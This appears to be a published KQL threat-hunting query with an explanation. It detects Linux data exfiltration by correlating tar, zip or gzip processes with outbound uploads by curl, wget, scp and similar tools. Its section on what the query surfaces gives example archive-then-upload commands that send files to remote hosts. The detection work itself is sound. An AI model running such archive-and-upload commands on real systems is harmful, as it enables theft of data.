KQL Search

Query Details

HomeAI ToolsDevice Query

Linux Archive Command Followed By Upload Egress

Query

## Linux – Archive Command Followed by Upload Egress – Last 24h

### Query name

**`Linux – Archive command followed by upload egress – last 24h`**

---

## Why this hunt works on Linux

On Linux systems:

* Archive creation often occurs in memory‑backed locations (for example `/tmp`)
* File telemetry is not guaranteed for all filesystems or mount types
* Exfiltration is frequently performed by a *different process* than the one that created the archive

As a result, correlating **process execution + network egress within a time window** is significantly more reliable than attempting a strict file‑event join.

---

## Query

```kql
// Update DeviceName and time window as required
let Device = "DeviceNameHere";
let ArchiveProc =
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where DeviceName =~ Device
    | where FileName in ("tar","zip","gzip")
    | where ProcessCommandLine has_any (".zip", ".tgz", ".tar", "tar -c", "tar -cz", "zip ")
    | project
        DeviceId,
        DeviceName,
        ArchiveTime = Timestamp,
        ArchiveProc = FileName,
        ArchiveCmd = ProcessCommandLine,
        AccountName;
let UploadEgress =
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where DeviceName =~ Device
    | where RemoteIP !startswith "127."
    | where RemoteIPType == "Public" or isempty(RemoteIPType)
    | where InitiatingProcessFileName in ("curl","wget","python","python3","openssl","scp","sftp")
    | project
        DeviceId,
        NetTime = Timestamp,
        NetProc = InitiatingProcessFileName,
        NetCmd = InitiatingProcessCommandLine,
        RemoteIP,
        RemotePort;
ArchiveProc
| join kind=inner (UploadEgress) on DeviceId
| where NetTime between (ArchiveTime .. ArchiveTime + 30m)
| project
    ArchiveTime,
    NetTime,
    DeviceName,
    AccountName,
    ArchiveProc,
    ArchiveCmd,
    NetProc,
    NetCmd,
    RemoteIP,
    RemotePort
| order by ArchiveTime desc
```

---

## What this query surfaces

This hunt will surface behaviour such as:

* Creation of archives immediately prior to outbound uploads
* Data exfiltration using common Linux utilities (`curl`, `scp`, `python`)
* Red team and EDR test activity
* Manual attacker workflows where tooling is chained together

Examples include:

* `tar -czf data.tgz data/` followed by `curl -F [email protected] https://…`
* `zip staging.zip *` followed by `scp staging.zip user@remote:/tmp/`

---

## Why this avoids common false negatives

This approach intentionally avoids:

* Dependence on `DeviceFileEvents`
* Assumptions about filesystem visibility
* Assumptions that the same process performs both actions

As a result, it reliably catches activity that Defender XDR alerts on but which simpler hunts often miss.

Explanation

This query is designed to detect suspicious activity on Linux systems by identifying instances where files are archived and then uploaded to an external location within a short time frame. Here's a simplified breakdown:

  1. Purpose: The query aims to find cases where a file is archived (compressed) and then quickly uploaded to an external server, which might indicate data exfiltration or unauthorized data transfer.

  2. How it Works:

    • It looks at process events to find when archive commands (tar, zip, gzip) are executed on a specified device within the last 24 hours.
    • It also examines network events to identify outbound connections made by processes like curl, wget, scp, etc., which are common for uploading files.
    • The query then correlates these two activities (archiving and uploading) if they occur on the same device and within 30 minutes of each other.

  3. What it Surfaces:

    • Instances where files are archived and then uploaded, potentially indicating data exfiltration.
    • Use of common Linux tools for uploading files, which might be used by attackers or during security tests.
    • Manual or automated workflows that involve creating an archive and then transferring it out of the system.

  4. Why It's Effective:

    • It doesn't rely on file system events, which might not be available or reliable on all systems.
    • It doesn't assume that the same process performs both archiving and uploading, which is a common tactic to evade detection.
    • By focusing on process execution and network activity, it captures a broader range of suspicious behaviors that simpler methods might miss.

Details

Nathan Hutchinson profile picture

Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceProcessEventsDeviceNetworkEvents

Keywords

LinuxDevicesNetworkProcessArchiveUploadEgress

Operators

letwhereinhas_anyprojectjoinkind=innerbetweenorder bydescago=~!startswithisempty

Actions